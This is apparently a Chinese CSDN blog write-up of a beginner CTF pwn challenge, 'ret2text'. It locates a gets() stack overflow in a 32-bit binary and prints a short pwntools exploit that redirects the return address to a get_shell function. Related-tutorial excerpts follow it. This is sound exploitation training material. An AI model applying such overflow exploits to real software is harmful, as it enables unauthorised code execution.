入门pwn题目ret2text

最新推荐文章于 2024-08-06 17:45:33 发布
最新推荐文章于 2024-08-06 17:45:33 发布
阅读量113 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/llrraa2010/article/details/129781257
版权
文章详细描述了分析32位程序的过程,通过ida发现函数vulnerable存在缓冲区溢出,并找到get_shell函数的地址。使用gdb设置断点,观察堆栈信息后,构建了payload来利用这个溢出漏洞,最终目标是执行get_shell功能。
摘要由CSDN通过智能技术生成 
file ret2text

看到是32位程序。
用32位ida打开,f5看函数,发现vulnerable存在溢出。
同时发现get_shell函数可以打开shell,地址为0x8048522

int vulnerable()
{
  char buffer[8]; // [esp+8h] [ebp-10h]

  gets(buffer);
  return 0;
}

gdb程序,

b main
r
b vulnerable
c
b 0x0804851d
c
输入没有溢出的数据:aaaaa

在这里插入图片描述
看堆栈,返回的地址存在0x8c,buf地址为0x78,偏离20。
构造exp

from pwn import *
io= process('./ret2text')
io.recvline()
payload=b'a'*20+p32(0x8048522)
io.sendline(payload)
io.interactive()

题目下载

llrraa2010
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ret2text知识点及例题
weixin_44864859的博客
05-19 1380
ret2text 这里涉及到的知识 Stack: No canary found NX: NX enabled ret2text: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked 1.首先是stack保护措施,如果开启的话在栈中返回地址前放一个随机值,如果被覆盖,程序就会报错退出 2.nx则是 no execution,如果开启的话就不能让ip寄存器指向堆和栈。。。。注意堆和栈是不
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6312
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
pwn入门之ret2text
wangxunyu6的博客
01-07 1206
重点来了:存在gets函数,先让我们了解一下gets函数,它可以无限读入数据,造成栈溢出。观察到s变量距离ebp有0x28的距离,对于这个题来说栈结构为先读入s变量然后下面是ebp然后才是返回地址,那么我们就有思路了,往s变量里面填充垃圾数据直到返回地址把返回地址改为我们需要的flag的位置。第四行:这是我们人为构造的代码数据,根据思路填充垃圾数据0x28个,因为这是32位elf文件所以需要再加上4,p32(flag)即为我们的返回地址。0不用管buf是我们输入数据的地方,0x32是能写入的字节数。
pwn学习笔记(2)ret_2_text_or_shellcode
qq_66013948的博客
02-04 1378
​ ax寄存器:通用寄存器,可用于存放多种数据​ bp寄存器:存放的是栈帧的栈底地址​ sp寄存器:存放的是栈顶的地址​ 栈帧是存储函数的一些信息的地方,栈帧存储有函数的局部变量,传递给子函数的实际参数,父函数的地址以及上一个栈帧栈底的地址,大致情况如下:​ 在函数调用的过程中,首先会讲bp寄存器的值进行压栈,以方便在恢复的时候恢复栈底寄存器的值,再之后,会按顺序将局部变量压栈,最后是子函数的实际参数,会按照先入栈的后出栈,从最后一个实际参数先入栈再到第一个实际参数,比如函数a(int a ,
ret2text学习笔记 --- PWN入门题目
xindada559的博客
06-09 461
最近学习了B站上的有关PWN入门视频课,简单写点笔记,学习一下叭 先上下学习链接,大佬讲的很细致,多听两遍总没坏处。 XMCVE 2020 CTF Pwn入门课程 shouxian
pwn-栈溢出】— ret2text
weixin_43988488的博客
03-19 549
使用checksec检查程序的架构以及保护情况寻找程序漏洞函数,比如如gets,scanf等计算目标变量的在堆栈中与栈底(32:ebp,64:rbp)的之间偏移查看程序导入表,观察表中是否已导入可利用的函数,比如system,execve等分析是否有字符串/bin/sh,将它作为system的参数在此程序中,它直接提供一个后门函数,供我们使用。
【ctf】ret2text
woodwhale的博客
04-17 5720
PWN ret2text 题目链接:ret2text 参考博客:CTF Wiki 基本 ROP 参考视频:【CTF】Linux PWN入门 Bamboofox社课系列 0x01 下载ret2text文件,复制到 翔哥的van美pwn机 中 查看保护机制 Arch: i386-32-little //文件为32位程序 RELRO: Partial RELRO Stack: No canary found //未开启canary保护 NX: NX enabled
Pwn学习-ret2text
cdl10000的博客
11-04 134
调用system函数需要b'a'*0x70 + p32(0x804863a),也可以b'a'*112 + p32(0x804863a)发现0x0804863A位置有/bin/sh内容执行system函数。本内容主要是pwn入门学习,大佬勿喷!------漏洞栈溢出练习。是32位可执行程序,没有开启保护,使用ida查看程序伪代码。ret返回函数的esp地址是0xffffd4cc。shift+f12查看程序是否有shell函数。输入的起始地址是0xffffd45c。因此计算偏移量为70。
入门到放弃系列 ret2text
weixin_43489686的博客
09-10 1473
ret2text 这道题目是一道入门级别的题目,主要还是熟悉堆栈原理和工具的使用,那么话不多说,开始看题。 做题的第一步,先看看这道题的基本逻辑,那把程序试运行一遍发现是简单的输入输出和很常规的嘲讽战术。既然有输入输出又是pwn题应该也是肯定有溢出漏洞的(强行推断)。 做题第二步,那再看看这个程序有没有什么保护措施,发现只开了一个堆栈不可执行的保护,总之就是这个程序相当不安全。同时还发现这个程序...
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc2pwn 入门
02-11
pwn 入门
ret2libc1pwn 入门
02-11
pwn 入门
pwn入门题目汇总.rar
09-01
本压缩包“pwn入门题目汇总.rar”显然是为初学者准备的一系列练习,旨在帮助他们了解和掌握pwn的基本概念和技术。 在学习pwn的过程中,首先需要理解的是计算机内存的工作原理,特别是栈、堆和全局变量的布局。栈是...
jupyter下载
Einstein·Jun
08-06 245
Anaconda下载 参考链接:https://blog.csdn.net/qq_48372575/article/details/125630622 设置Jupyter Notebook的代码路径 在“此电脑”中搜索。删除最后一个""后面的的内容,包括“\”。 用记事本打开它。 按下ctrl+F就可以开始查找。查找内容如下: 找到之后,右键该文件,找到“发送到”,找到“桌面快捷方式”。然后就会发现桌面上已经建立好了!
Python 和 C++ 环境下安装和使用 ONNX Runtime
CDBmax的博客
08-03 319
对于 GPU 版本的 ONNX Runtime,需要安装 CUDA 和 cuDNN。请检查 CUDA 执行提供程序的要求以获取兼容版本的 CUDA 和 cuDNN。通过上述步骤和示例代码,您可以在 Python 和 C++ 环境下安装并使用 ONNX Runtime 进行模型推理。《windows端可以用 vs编辑器配置相应的头文件、库文件》《这部分可以去B站有很多教学视频讲的更详细》
【面试题】寻找两个正序数组的中位数
联系方式:927632640
08-06 312
面试学习给定两个大小分别为 m 和 n 的正序数组 nums1 和 nums2,我们需要找到这两个数组的中位数。下面是详细的解题步骤和 Python 代码示例。
Java 设计模式之桥接模式(Bridge Pattern)
微笑听雨
08-05 931
桥接模式(Bridge Pattern)是一种用于将抽象部分与其实现部分分离的结构型设计模式。这种模式通过组合关系而不是继承关系来连接抽象与实现,使代码更具扩展性和维护性。桥接模式的核心思想是将抽象和实现解耦,使得两者可以独立变化。桥接模式(Bridge Pattern)是一种结构型设计模式,旨在将抽象部分与其实现部分分离,从而使两者可以独立地变化。桥接模式通过组合关系代替继承关系,将抽象和实现解耦,使代码更具扩展性和维护性。
书生大模型实战营第三期——入门岛——python基础知识
最新发布
qq_46576562的博客
08-06 163
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值